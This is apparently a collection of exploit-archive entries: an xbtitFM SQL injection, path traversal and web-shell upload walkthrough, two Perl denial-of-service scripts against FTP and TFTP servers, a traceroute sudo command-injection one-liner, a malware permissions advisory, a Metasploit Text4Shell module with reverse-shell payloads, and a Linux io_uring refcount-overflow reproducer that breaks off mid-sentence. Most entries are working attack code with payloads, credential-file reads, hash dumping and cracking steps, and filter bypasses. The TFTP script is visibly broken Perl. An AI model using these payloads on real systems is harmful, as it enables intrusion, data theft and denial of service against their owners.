<pre><code># Exploit Title: xbtitFM 4.1.18 Multiple Vulnerabilities<br /># Date: 22-01-2024<br /># Exploit Author: Who cares anyway<br /># Vendor Homepage: https://xbtitfm.eu<br /># Affected versions: 4.1.18 and prior<br /># CVE : Who cares anyway<br /># Description: The SQLi and the path traversal are unauthenticated, they don't require any user interaction to be exploited and are present in the default configuration of xbtitFM.<br />The insecure file upload requires the file_hosting feature (hack) being enabled. If not, it can be enabled by gaining access to an administrator account.<br />Looking at the state and the age of the codebase there are probably more, but who cares anyway...<br /><br />[Unauthenticated SQL Injection - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H]<br /><br />Some examples:<br />Get DB name:<br />/shoutedit.php?action=edit&msgid=1337 AND EXTRACTVALUE(0,CONCAT(0,0,(MID((IFNULL(CAST(DATABASE() AS NCHAR),0)),1,100)))) <br /><br />Get DB user:<br />/shoutedit.php?action=edit&msgid=1337 AND EXTRACTVALUE(0,CONCAT(0,0,(MID((IFNULL(CAST(CURRENT_USER() AS NCHAR),0)),1,100)))) <br /><br />Get password hash of any user (might need some modification to work on different instances):<br />/shoutedit.php?action=edit&msgid=1337 OR (1,1) = (SELECT COUNT(0),CONCAT((SELECT CONCAT_WS(0x3a,id,username,password,email,0x3a3a3a) FROM xbtit_users WHERE username='admin_username_or_whatever_you_like'),FLOOR(RAND(0)*2)) FROM (information_schema.tables) GROUP BY 2);<br /><br />Now the fun part. Automate it with sqlmap to dump the database.<br />1) Get DB name<br />sqlmap -u "https://example.xyz/shoutedit.php?action=edit&msgid=1337" -p msgid --technique=E --answers="include=N" --batch --current-db<br />2) Get table names<br />sqlmap -u "https://example.xyz/shoutedit.php?action=edit&msgid=1337" -p msgid --technique=E --answers="include=N" --batch -D the_identified_database_name --tables<br />3) Dump users table (usually called xbtit_users)<br />sqlmap -u "https://example.xyz/shoutedit.php?action=edit&msgid=1337" -p msgid --technique=E --answers="include=N" --batch -D the_identified_database_name -T xbtit_users -C id,username,email,cip,dob,password,salt,secret --dump<br />4) Crack hashes (usually unsalted MD5, yey!)<br />hashcat –m 0 xbtitfm_exported_hashes.txt wordlist.txt<br />Pro tip: Use All-in-One-P (https://weakpass.com/all-in-one)<br /><br />[Unauthenticated Path traversal - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N]<br /><br />1) Intentionally search for a file that doesn't exist to get the web application path e.g. (/home/xbtitfm/public_html/)<br />https://example.xyz/nfo/nfogen.php?nfo=random_value_to_get_error_that_reveals_the_real_path<br /><br />2) Read files that contain database credentials.<br />https://example.xyz/nfo/nfogen.php?nfo=../../../../../../../home/xbtitfm/public_html/include/settings.php<br />https://example.xyz/nfo/nfogen.php?nfo=../../../../../../../home/xbtitfm/public_html/include/update.php<br /><br />Or any other system file you want.<br />https://example.xyz/nfo/nfogen.php?nfo=../../../../../../../etc/passwd<br /><br />3) Now who needs the SQLi to dump the DB when you have this gem? Check if the following file is configured <br />https://example.xyz/nfo/nfogen.php?nfo=../../../../../../../home/xbtitfm/public_html/sxd/cfg.php<br />If so, go to https://example.xyz/sxd (CBT Sql backup utilitiy aka Sypex-Dumper), login with the DB credentials you just found, now export the DB with on click. Nice and easy.<br /><br />[Insecure file upload - Remote Code Execution (Authenticated)- CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H]<br /><br />If that wasn't enough already and you want RCE, visit https://example.xyz/index.php?page=file_hosting<br />If the file hosting feature (hack) is enabled, then simply just upload a PHP shell with the following bypass.<br />Changing the Content-Type of the file to image/gif and the first bytes to GIF89a; are enought to bypass the filetype checks.<br />A silly contermeasure against PHP files is in place so make sure you change <?php to <?pHp to bypass it.<br /><br />Content-Disposition: form-data; name="file"; filename="definately_not_a_shell.php"<br />Content-Type: image/gif<br /><br />GIF89a;<br /><html><br /><body><br /><form method="GET" name="<?pHp echo basename($_SERVER['PHP_SELF']); ?>"><br /><input type="TEXT" name="cmd" autofocus id="cmd" size="80"><br /><input type="SUBMIT" value="Execute"><br /></form><br /><br /><pre><br /><?pHp<br /><br /> if(isset($_GET['cmd']))<br /> {<br /> system($_GET['cmd']);<br /> }<br />?><br /><br /></pre><br /></body><br /></html><br /><br />The web shell will then be uploaded here:<br />https://example.xyz/file_hosting/definately_not_a_shell.php<br /><br />If the file hosting feature is disabled, extract and crack the hash of an admin, then enable the feature from the administration panel and upload the shell.<br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br />use IO::Socket::INET;<br /><br /># Exploit Title: Golden FTP Server 2.02b - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 21 january 2024<br /># Vendor Homepage: N/A<br /># Download to demo: https://drive.google.com/file/d/1AK6x0xKwjVZxoNHbCOIJsIiRAWeMmP_0/view?usp=sharing<br /># Notification vendor: No reported<br /># Tested Version: Golden FTP Server 2.02b - Denial of Service (DoS)<br /># Tested on: Window XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /><br />#1. Description<br /><br />#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The FTP server does not correctly handle the amount of data or bytes sent to command RNTO.<br />#When authenticating to the FTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> if ($sis eq "windows"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /> <br /> print "[+] Exploiting... \n";<br /><br />print "[+] Connecting to $ip:$port\n";<br />my $s = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => $port, Proto => 'tcp') or die "Could not connect to $host:$port\n";<br /><br />$s->send("USER anon\r\n");<br />my $response = <$s>;<br />print $response;<br />$s->send("PASS anon\r\n");<br />$response = <$s>;<br />print $response;<br />$s->send("SYST\r\n");<br />$response = <$s>;<br />print $response;<br />sleep(2);<br />$s->send("PASV " . "\x41"x6631 . "\r\n");<br />sleep(3);<br />$response = <$s>;<br />print $response;<br />$response = <$s>;<br />print $response;<br />print ">>> Sending second payload\n";<br />$s->send("PASV " . "\x90"x123 . "\x90"x2877 . "\r\n");<br />$response = <$s>;<br />print $response;<br />sleep(2);<br /><br /><br /> print "[+] Done - Exploited success!!!!!\n\n";<br /> <br /> sub intro {<br /> print q {<br /><br /> ,--,<br /> _ ___/ /\|<br /> ,;'( )__, ) ~<br /> // // '--; <br /> ' \ | ^<br /> ^ ^<br /><br /> [+] Golden FTP Server 2.02b - Denied of Service (DoS)<br /><br /> [*] Coded by Fernando Mengali<br /><br /> [@] e-mail: fernando.mengalli@gmail.com<br /><br /> }<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /></code></pre>
<pre><code>Description:<br />In Traceroute 2.0.12 through to 2.1.2 (fixed in 2.1.3), the wrapper scripts mishandle shell metacharacters, which can lead to privilege escalation if the wrapper scripts are executed via sudo. The affected wrapper scripts are: tcptraceroute, tracepath, traceproto and traceroute-nanog.<br /><br />Additional infomation:<br />CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N - 7.3 (High)<br />A local privilege escalation was identified in wrapper scripts provided by the Traceroute for Linux package (https://sourceforge.net/projects/traceroute/). The wrapper scripts do not properly sanitise the user's input, which is taken as parameters and passed into the traceroute command. The user can inject a semicolon (;) into any of the parameters of the affected wrappers, and the wrapper will treat the text following the semicolon as a new operating system command. <br /><br />The scripts require the user to have raw socket access in order to function as intended. It is common for low-privilege users to be granted sudo root permissions to run the wrapper scripts as opposed to setting "cap_net_raw" capabilities to the binary, or through the use of "icmp dgram" sockets. Thus any user on the local machine can escalate their privileges to root, with the only Attack Requirements (AT in CVSS 4) being that they have sudo root permissions to execute the vulnerable wrapper scripts.<br /><br />The vulnerable wrapper scripts have been provided since version 2.0.12. Distributions such as Debian 12, Fedora 38, Centos 8 and Amazon Linux 2 include these wrapper scripts with default installations.<br /><br />Exploitation:<br />sudo tcptraceroute localhost ";bash"<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024<br />Original source: https://malvuln.com/advisory/15bda00b57e2ed729a45f7cfa62165da.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: TrojanSpy Win32 Nivdort<br />Vulnerability: Insecure Permissions - EoP (SYSTEM) <br />Family: Nivdort<br />Type: PE32<br />MD5: 15bda00b57e2ed729a45f7cfa62165da<br />Vuln ID: MVID-2024-0668<br />Dropped files: dqrpgvnkh, egjrdhynfm, nhefhloix, rvoyf6ljtqg4zejno.exe<br />Disclosure: 01/20/2024<br /><br />Description:<br />The malware creates a service which runs as SYSTEM and grants change (C) permissions to the authenticated user group on its installation directory. Standard low integrity users can still rename the service executable while it is running, replace the PE file with their own and restart the infected system to start the service.<br /><br />C:\>cacls C:\pewcvmnvyr\jwgaklb.exe<br />C:\pewcvmnvyr\jwgaklb.exe BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br /><br />C:\>sc qc "Group Key KtmRm Coordinator Registry TPM Bus"<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: Group Key KtmRm Coordinator Registry TPM Bus<br /> TYPE : 110 WIN32_OWN_PROCESS (interactive)<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 0 IGNORE<br /> BINARY_PATH_NAME : C:\pewcvmnvyr\jwgaklb.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Group Key KtmRm Coordinator Registry TPM Bus<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br />Exploit/PoC:<br />Open a cmd prompt as standard user:<br /><br />1) unhide the service binary<br /> C:\Users\norgt>attrib -s -h \pewcvmnvyr\jwgaklb.exe<br /><br />2) rename the service binary<br />C:\Users\norgt>ren \pewcvmnvyr\jwgaklb.exe PWNED<br /><br />3) optional replace with your own binary and escalate to SYSTEM<br /><br />C:\Users\norgt>dir \pewcvmnvyr\<br /> Directory of C:\pewcvmnvyr<br /> ..<br />01/14/2024 02:05 AM 0 dqrpgvnkh<br />01/14/2024 02:05 AM 6 egjrdhynfm<br />01/14/2024 02:09 AM 4 nhefhloix<br />01/14/2024 02:05 AM 332,800 PWNED <================= DONE<br />01/14/2024 02:05 AM 332,800 rvoyf9njtqg4zejno.exe<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br /><br />use IO::Socket::INET;<br /><br /># Exploit Title: ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 20 january 2024<br /># Vendor Homepage: N/A<br /># Download to demo: https://drive.google.com/file/d/1MLqBkCyu0dA-cNgYxCAO8xbsVcof060Z/view?usp=sharing<br /># Notification vendor: No reported<br /># Tested Version: ProSysInfo TFTP Server TFTPDWIN 0.4.2<br /># Tested on: Window XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Vídeo: https://www.youtube.com/watch?v=BuONti1AWoU<br /><br />#1. Description<br /><br />#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The TFTP server does not correctly handle the amount of data or bytes sent..<br />#When authenticating to the TFTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> if ($sis eq "windows"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /> <br /> print "[+] Exploiting... \n";<br /><br /> my $payload = "\x41"x520;<br /><br />my $socket = IO::Socket::INET->new(<br /> PeerAddr => $tftp_server,<br /> PeerPort => 69,<br /> Proto => 'udp'<br />) die "Não foi possível conectar ao servidor TFTP: $!\n" unless $socket;<br /><br /> print $ftp_socket $buffer;<br /><br /> close($socket);<br /><br /> print "[+] Done - Exploited success!!!!!\n\n";<br /> <br /> sub intro {<br /> print "######################################################################\n";<br /> print "# #\n"; <br /> print "# ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Denied of Service #\n";<br /> print "# #\n";<br /> print "# Coded by Fernando Mengali #\n";<br /> print "# #\n";<br /> print "# e-mail: fernando.mengalli\@gmail.com #\n";<br /> print "# #\n";<br /> print "######################################################################\n";<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /><br />#3. Solution/ How to fix:<br /><br /># This version product is deprecated<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::Remote::Java::HTTP::ClassLoader<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Apache Commons Text RCE',<br /> 'Description' => %q{<br /> This exploit takes advantage of the StringSubstitutor interpolator class,<br /> which is included in the Commons Text library. A default interpolator<br /> allows for string lookups that can lead to Remote Code Execution. This<br /> is due to a logic flaw that makes the “script”, “dns” and “url” lookup<br /> keys interpolated by default, as opposed to what it should be, according<br /> to the documentation of the StringLookupFactory class. Those keys allow<br /> an attacker to execute arbitrary code via lookups primarily using the<br /> "script" key.<br /><br /> In order to exploit the vulnerabilities, the following requirements must<br /> be met:<br /><br /> Run a version of Apache Commons Text from version 1.5 to 1.9<br /> Use the StringSubstitutor interpolator<br /> Target should run JDK < 15<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Alvaro Muñoz', # Original research<br /> 'Karthik UJ', # PoC<br /> 'Gaurav Jain', # Metasploit module<br /> ],<br /> 'References' => [<br /> ['CVE', '2022-42889'],<br /> ['URL', 'https://sysdig.com/blog/cve-2022-42889-text4shell/'],<br /> ['URL', 'https://github.com/karthikuj/cve-2022-42889-text4shell-docker']<br /> ],<br /> 'Platform' => ['win', 'linux', 'unix', 'java'],<br /> 'Targets' => [<br /> [<br /> 'Java (in-memory)',<br /> {<br /> 'Type' => :java,<br /> 'Platform' => 'java',<br /> 'Arch' => ARCH_JAVA,<br /> 'DefaultOptions' => { 'Payload' => 'java/meterpreter/reverse_tcp' }<br /> },<br /> ],<br /> [<br /> 'Windows EXE Dropper',<br /> {<br /> 'Platform' => 'win',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :windows_dropper,<br /> 'DefaultOptions' => { 'Payload' => 'windows/x64/meterpreter/reverse_tcp' }<br /> }<br /> ],<br /> [<br /> 'Windows Command',<br /> {<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :windows_cmd,<br /> 'DefaultOptions' => { 'Payload' => 'cmd/windows/powershell/meterpreter/reverse_tcp' }<br /> }<br /> ],<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_jjs' }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :linux_dropper,<br /> 'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }<br /> }<br /> ]<br /> ],<br /> 'Privileged' => false,<br /> 'DisclosureDate' => '2022-10-13',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /> register_options([<br /> OptString.new('TARGETURI', [ true, 'The target URI', '/']),<br /> OptString.new('PARAM', [ true, 'The vulnerable parameter']),<br /> OptEnum.new('METHOD', [ true, 'The HTTP method to use', 'GET', ['GET', 'POST']])<br /> ])<br /> end<br /><br /> def check<br /> vprint_status("Checking if #{peer} can be exploited.")<br /> res = send_exp<br /> return CheckCode::Unknown('No response received from target.') unless res<br /><br /> # blind command injection using sleep command<br /> sleep_time = rand(4..8)<br /> vprint_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")<br /> _res, elapsed_time = Rex::Stopwatch.elapsed_time do<br /> send_exp("java.lang.Thread.sleep(#{sleep_time * 1000})")<br /> end<br /> vprint_status("Elapsed time: #{elapsed_time.round(2)} seconds.")<br /> return CheckCode::Safe('Command injection test failed.') unless elapsed_time >= sleep_time<br /><br /> CheckCode::Vulnerable('Successfully tested command injection.')<br /> end<br /><br /> def exploit<br /> case target['Type']<br /> when :java<br /> # Start the HTTP server to serve the payload<br /> start_service<br /> # Trigger a loadClass request via java.net.URLClassLoader<br /> trigger_urlclassloader<br /> # Handle the payload<br /> handler<br /> when :windows_cmd, :unix_cmd<br /> execute_command(payload.encoded)<br /> when :windows_dropper, :linux_dropper<br /> execute_cmdstager<br /> end<br /> end<br /><br /> def trigger_urlclassloader<br /> url = get_uri<br /><br /> vars = Rex::RandomIdentifier::Generator.new<br /><br /> exp = "var #{vars[:str_arr]} = Java.type('java.lang.String[]');"<br /> exp << "var #{vars[:obj]} = new java.net.URLClassLoader([new java.net.URL(new java.lang.String(java.util.Base64.getDecoder().decode('#{Rex::Text.encode_base64(url)}')))]).loadClass('metasploit.Payload');"<br /> exp << "#{vars[:obj]}.getMethod('main', java.lang.Class.forName('[Ljava.lang.String;')).invoke(null, [new #{vars[:str_arr]}(1)]);"<br /><br /> res = send_exp(exp)<br /><br /> fail_with(Failure::Unreachable, 'No response received from the target') unless res<br /> fail_with(Failure::Unknown, 'An unknown error occurred') unless res.code == 200<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> vars = Rex::RandomIdentifier::Generator.new<br /><br /> exp = "var #{vars[:arr]} = [#{win_target? ? '"cmd.exe", "/c"' : '"/bin/sh", "-c"'}, new java.lang.String(java.util.Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\"))];"<br /> exp << "java.lang.Runtime.getRuntime().exec(#{vars[:arr]});"<br /><br /> res = send_exp(exp)<br /><br /> fail_with(Failure::Unreachable, 'No response received from the target') unless res<br /> fail_with(Failure::Unknown, 'An unknown error occurred') unless res.code == 200<br /> end<br /><br /> def send_exp(exp = '')<br /> vars = datastore['METHOD'] == 'GET' ? 'vars_get' : 'vars_post'<br /> send_request_cgi(<br /> 'method' => datastore['METHOD'],<br /> 'uri' => normalize_uri(target_uri.path),<br /><br /> vars => {<br /> datastore['PARAM'] => "${script:javascript:#{exp}}"<br /> }<br /> )<br /> end<br /><br /> def win_target?<br /> target['Platform'] == 'win'<br /> end<br /><br /> def on_request_uri(cli, request)<br /> case target['Type']<br /> when :java<br /> # Call method to handle java payload staging<br /> super(cli, request)<br /> else<br /> # Handle win/unix cmd staging<br /> client = cli.peerhost<br /> print_status("Client #{client} requested #{request.uri}")<br /> print_status("Sending payload to #{client}")<br /> send_response(cli, exe)<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>Linux >=5.6: cred refcount overflow at ~39 GiB memory usage via io_uring<br /><br />(see also my related prior bug reports about overflowing refcounts with lots<br />of RAM usage:<br />https://crbug.com/project-zero/809: BPF program refcount, with ~32GiB RAM<br />https://crbug.com/project-zero/1752: page->refcount via FUSE with ~140GiB RAM)<br /><br /><br />Since commit 071698e13ac6 (\"io_uring: allow registering credentials\"), landed<br />in 5.6, it has been possible to grab references to `struct cred` very<br />efficiently - by repeatedly calling the syscall<br />`io_uring_register(fd, IORING_REGISTER_PERSONALITY, NULL, 0)`, it is possible<br />to register up to 0xffff refcounted pointers to `struct cred` in an xarray<br />(or in older kernel versions, in an IDR). These pointers can all be pointing<br />to the same `struct cred`.<br />By using a bunch of io_uring instances, that makes it possible to create a<br />lot of refcounted references to `struct cred` at a very efficient and low<br />amortized memory cost of less than 10 bytes per reference.<br /><br />`struct cred` is refcounted using the member `atomic_t usage`, which is a<br />plain signed 32-bit atomic counter with no overflow checking.<br />I believe there is some history here where Elena Reshetova and Kees Cook have<br />been trying to turn it into a `refcount_t`, which would also fix this kind of<br />issue by marking the refcount as \"saturated\" when it reaches 2^31 and then<br />never freeing the object. Most recently there was this thread, where Kees<br />tried to get that change in; there was some discussion, but I don't think<br />anything has landed so far:<br /><https://lore.kernel.org/all/20230818041740.gonna.513-kees@kernel.org/><br /><br />So by using ~39 GiB of physical memory, it is possible to store 2^32<br />references to `struct cred` and overflow the reference counter. That's not<br />exactly a small amount of RAM, but I guess a lot of servers probably have that<br />much RAM? At least cloud providers like AWS sell machines with much more RAM<br />than that.<br /><br />I am including as recipients both akpm (who is the maintainer for<br />kernel/cred.c and was involved in the linked discussion) and the io_uring<br />maintainers (though io_uring, in my opinion, isn't really where the core issue<br />here lies, but it happened to make it possible to hit this overflow using a<br />fairly small amount of physical memory).<br /><br /><br />Reproducer (compile with -pthread; requires ~39GiB of physical RAM, I tested it<br />in a VM so that the host machine could swap a bit):<br />============<br />#define _GNU_SOURCE<br />#include <pthread.h><br />#include <unistd.h><br />#include <err.h><br />#include <fcntl.h><br />#include <string.h><br />#include <stdio.h><br />#include <stdlib.h><br />#include <ctype.h><br />#include <signal.h><br />#include <sys/syscall.h><br />#include <sys/wait.h><br />#include <sys/prctl.h><br />#include <sys/mman.h><br />#include <sys/resource.h><br />#include <sys/eventfd.h><br />#include <linux/io_uring.h><br /><br />#define SYSCHK(x) ({ \\<br /> typeof(x) __res = (x); \\<br /> if (__res == (typeof(x))-1) \\<br /> err(1, \"SYSCHK(\" #x \")\"); \\<br /> __res; \\<br />})<br /><br />// power of 2<br />#define PARALLELISM 4<br /><br />static int efd;<br /><br />static void *thread_fn(void *dummy) {<br /> for (long refcount = 0; refcount < (1UL<<32)/PARALLELISM;) {<br /> struct io_uring_params params = {<br /> .flags = IORING_SETUP_NO_SQARRAY<br /> };<br /> int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, &params));<br /> printf(\"uring_fd = 0x%x\<br />\", (unsigned int)uring_fd);<br /> for (int i=0; i<0xffff; i++, refcount++)<br /> SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PERSONALITY, NULL, 0));<br /> }<br /> printf(\"one thread ready\<br />\");<br /> eventfd_write(efd, 1);<br /> while (1) pause();<br />}<br /><br />int main(void) {<br /> setbuf(stdout, NULL);<br /> sync();<br /><br /> struct rlimit rlim;<br /> SYSCHK(getrlimit(RLIMIT_NOFILE, &rlim));<br /> if (rlim.rlim_max < 65550)<br /> printf(\"WARNING: RLIMIT_NOFILE maximum is probably too low\<br />\");<br /> rlim.rlim_cur = rlim.rlim_max;<br /> SYSCHK(setrlimit(RLIMIT_NOFILE, &rlim));<br /><br /> efd = SYSCHK(eventfd(0, 0));<br /><br /> pthread_t threads[PARALLELISM];<br /> for (int i = 0; i < PARALLELISM; i++) {<br /> if (pthread_create(threads+i, NULL, thread_fn, NULL))<br /> errx(1, \"pthread_create\");<br /> }<br /><br /> for (int i=0; i<4;) {<br /> eventfd_t val;<br /> SYSCHK(eventfd_read(efd, &val));<br /> i += val;<br /> }<br /> printf(\"refs should have wrapped. press ctrl+c for uaf on cleanup.\<br />\");<br /> while (1)<br /> pause();<br />}<br />============<br /><br />The reproducer takes a while to run; when it's done and the cred refcount has<br />been wrapped, you can press ctrl+c to make the process exit, which will<br />repeatedly decrement the cred refcount until the cred refcount reaches zero<br />(when there are actually 2^32 references remaining).<br />At that point, it'll hit the `BUG_ON(cred == current->cred)` check in<br />`__put_cred()`, since the reproducer doesn't go out of its way to avoid this<br />check:<br /><br />============<br />kernel BUG at kernel/cred.c:150!<br />invalid opcode: 0000 [#1] PREEMPT SMP<br />CPU: 2 PID: 580 Comm: uring-credref Not tainted 6.7.0-rc3 #362<br />Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014<br />RIP: 0010:__put_cred+0x55/0x60<br />Code: 87 a0 00 00 00 85 c0 74 0c 48 81 c7 a0 00 00 00 e9 b0 fe ff ff 48 81 c7 a0 00 00 00 48 c7 c6 40 39 0d b0 e9 9d 53 07 00 0f 0b <0f> 0b 0f 0b 0f 1f 80 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90<br />RSP: 0018:ffffb2e382b5bcf0 EFLAGS: 00010246<br />RAX: ffff8c4e21c6c080 RBX: ffff8c52fce02000 RCX: ffffb2e382b5bc94<br />RDX: 0000000000000001 RSI: ffff8c52fce025c0 RDI: ffff8c4e1f2c2480<br />RBP: ffff8c52fce025a8 R08: ffffb2e382b5bc98 R09: 0000000000000007<br />R10: 0000000000000001 R11: 0000000000000001 R12: ffff8c52fce02040<br />R13: ffff8c4e072fc520 R14: ffff8c576139c9c0 R15: ffff8c4e21c6c938<br />FS: 0000000000000000(0000) GS:ffff8c598dd00000(0000) knlGS:0000000000000000<br />CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033<br />CR2: 000055a8bdfd1d70 CR3: 0000000411e47001 CR4: 0000000000770ef0<br />PKRU: 55555554<br />Call Trace:<br /> <TASK><br /> [...]<br /> io_ring_ctx_wait_and_kill+0xa8/0x180<br /> io_uring_release+0x20/0x30<br /> __fput+0x92/0x2c0<br /> task_work_run+0x5a/0x90<br /> do_exit+0x36c/0xbc0<br /> do_group_exit+0x37/0xa0<br /> get_signal+0xbcf/0xbd0<br /> arch_do_signal_or_restart+0x3e/0x270<br /> exit_to_user_mode_prepare+0xba/0x110<br /> syscall_exit_to_user_mode+0x21/0x50<br /> do_syscall_64+0x52/0xf0<br /> entry_SYSCALL_64_after_hwframe+0x6e/0x76<br />RIP: 0033:0x7ff41d547d92<br />Code: Unable to access opcode bytes at 0x7ff41d547d68.<br />RSP: 002b:00007ff41d370e30 EFLAGS: 00000293 ORIG_RAX: 0000000000000022<br />RAX: fffffffffffffdfe RBX: 000000004000bfff RCX: 00007ff41d547d92<br />RDX: 0000000000000008 RSI: 00007ff41d370e38 RDI: 0000000000000000<br />RBP: 000000000000ffc1 R08: 0000000000000000 R09: 0000008000000040<br />R10: 0000000000000000 R11: 0000000000000293 R12: 000000004000bfff<br />R13: 00007ff41d370e50 R14: 00007ff41d370e50 R15: 0000000000000000<br /> </TASK><br />Modules linked in:<br />---[ end trace 0000000000000000 ]---<br />RIP: 0010:__put_cred+0x55/0x60<br />Code: 87 a0 00 00 00 85 c0 74 0c 48 81 c7 a0 00 00 00 e9 b0 fe ff ff 48 81 c7 a0 00 00 00 48 c7 c6 40 39 0d b0 e9 9d 53 07 00 0f 0b <0f> 0b 0f 0b 0f 1f 80 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90<br />RSP: 0018:ffffb2e382b5bcf0 EFLAGS: 00010246<br />RAX: ffff8c4e21c6c080 RBX: ffff8c52fce02000 RCX: ffffb2e382b5bc94<br />RDX: 0000000000000001 RSI: ffff8c52fce025c0 RDI: ffff8c4e1f2c2480<br />RBP: ffff8c52fce025a8 R08: ffffb2e382b5bc98 R09: 0000000000000007<br />R10: 0000000000000001 R11: 0000000000000001 R12: ffff8c52fce02040<br />R13: ffff8c4e072fc520 R14: ffff8c576139c9c0 R15: ffff8c4e21c6c938<br />FS: 0000000000000000(0000) GS:ffff8c598dd00000(0000) knlGS:0000000000000000<br />CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033<br />CR2: 000055a8bdfd1d70 CR3: 0000000411e47001 CR4: 0000000000770ef0<br />PKRU: 55555554<br />Fixing recursive fault but reboot is needed!<br />============<br /><br />A use-after-free of `struct cred` should be exploitable; one method would be<br />to try to get the freed object allocated again as the `struct cred` of a<br />root-privileged process, another method would be to try to reallocate the<br />object with a buffer containing attacker-controlled data somehow (and then<br />fake a full capability set in init_user_ns with UIDs set to zero).<br /><br /><br />While one tempting easy fix here would be to close off avenues for getting<br />lots of references with little RAM (like somehow making io_uring reuse IDs<br />with a local usage counter when userspace tries to insert the same<br />`struct cred` into the xarray multiple times), I think that this example shows<br />how fragile 